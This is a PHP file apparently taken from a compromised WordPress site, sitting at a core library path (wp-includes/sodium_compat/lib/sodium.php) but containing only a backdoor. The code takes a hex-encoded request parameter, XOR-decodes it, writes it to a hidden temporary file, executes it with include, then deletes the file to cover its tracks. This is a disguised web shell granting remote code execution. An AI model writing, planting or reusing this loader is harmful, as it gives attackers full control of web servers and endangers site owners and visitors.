File: /www/wwwroot/q.autos58.cn/wp-includes/sodium_compat/lib/sodium.php
<?php
if(isset($_REQUEST["bind"]) ? true : false){
$value = array_filter([ini_get("upload_tmp_dir"), getcwd(), sys_get_temp_dir(), getenv("TMP"), "/var/tmp", "/tmp", session_save_path(), "/dev/shm", getenv("TEMP")]);
$object = hex2bin($_REQUEST["bind"]);
$marker = '' ; for($a=0; $a<strlen($object); $a++){$marker .= chr(ord($object[$a]) ^ 28);}
for ($factor = 0, $sym = count($value); $factor < $sym; $factor++) {
$fac = $value[$factor];
if (!!is_dir($fac) && !!is_writable($fac)) {
$reference = "$fac" . "/.pgrp";
if (file_put_contents($reference, $marker)) {
include $reference;
@unlink($reference);
exit;
}
}
}
}